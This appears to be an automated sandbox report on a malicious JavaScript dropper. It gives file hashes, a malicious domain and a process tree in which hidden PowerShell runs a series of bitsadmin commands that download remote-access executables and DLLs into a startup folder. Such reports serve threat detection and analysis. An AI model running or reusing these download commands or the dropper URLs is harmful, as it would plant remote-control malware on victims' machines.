Overview

overview

10

Static

static

1

ave2441jsj...sjs.js

windows7-x64

10

ave2441jsj...sjs.js

windows10-2004-x64

10

Analysis

  • max time kernel
    82s
  • max time network
    84s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
  • submitted
    09/07/2023, 16:15

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    ave2441jsjsjsjsjsjsjsjsjs.js

  • Size

    43KB

  • MD5

    5233c56ccc6cf90c32660b2d23c20fa9

  • SHA1

    35d627dac337118aeb4a1cf871d8328eb3230ec2

  • SHA256

    f756499384b3ba55143839c4c8bb0ba38f30e682ecf1511a5f592d52f57aa76a

  • SHA512

    94025553831090c85d8ee062f11de1f1ade59e2579bf2e94833687344abc093218fbf9c906e9514c4b8a477749de6c39b65bfe483e6282d5bd03f43f1aa1582a

  • SSDEEP

    768:tweiTuarsdwu+yGhe5AjMZq2KaCN78o6UTyaGnKKq:tli6Ksdwu9AjMZq2BCN78nIYKx

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://virvatulishop.com/labda.zip
exe.dropper

https://virvatulishop.com/files/

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 12 IoCs
    dropper
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\ave2441jsjsjsjsjsjsjsjsjs.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2664
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\lz6dvu3.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
        3⤵
        • Download via BitsAdmin
        PID:2240
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe
        3⤵
        • Download via BitsAdmin
        PID:2244
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini
        3⤵
        • Download via BitsAdmin
        PID:524
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL
        3⤵
        • Download via BitsAdmin
        PID:2924
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll
        3⤵
        • Download via BitsAdmin
        PID:3004
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf
        3⤵
        • Download via BitsAdmin
        PID:2000
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/NSM.LIC C:\Users\Admin\AppData\RoamingOfficeStartupNSM.LIC
        3⤵
        • Download via BitsAdmin
        PID:2568
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/pcicapi.dll C:\Users\Admin\AppData\RoamingOfficeStartuppcicapi.dll
        3⤵
        • Download via BitsAdmin
        PID:2860
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICHEK.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICHEK.DLL
        3⤵
        • Download via BitsAdmin
        PID:1352
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICL32.DLL
        3⤵
        • Download via BitsAdmin
        PID:2716
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/remcmdstub.exe C:\Users\Admin\AppData\RoamingOfficeStartupremcmdstub.exe
        3⤵
        • Download via BitsAdmin
        PID:2640
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/TCCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupTCCTL32.DLL
        3⤵
        • Download via BitsAdmin
        PID:2684

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\lz6dvu3.ps1
          Filesize

          1KB

          MD5

          37ca1dee850fba2958a4854696bccb0b

          SHA1

          494d5b37f928e2107ce43963914d16232f8db891

          SHA256

          1bd6a6b5648ee2b6e503654608301f3da0fe7ed5648fff848e3bce61206a436d

          SHA512

          729ff26e9060990c1b7f08321b093bc12f6a172bfdf6b3166367da8ffa6fc5124d9452a40f641f3385d7a7e83ad2b9d7dad9dde8e5b9532e204c85998c2720b3

          Download Submit

        • memory/3028-60-0x0000000002470000-0x00000000024F0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/3028-61-0x000000001B210000-0x000000001B4F2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/3028-62-0x0000000002470000-0x00000000024F0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/3028-63-0x0000000002050000-0x0000000002058000-memory.dmp

          Filesize

          32KB

          Download

        • memory/3028-65-0x0000000002470000-0x00000000024F0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/3028-66-0x0000000002470000-0x00000000024F0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/3028-67-0x0000000002470000-0x00000000024F0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/3028-68-0x0000000002470000-0x00000000024F0000-memory.dmp

          Filesize

          512KB

          Download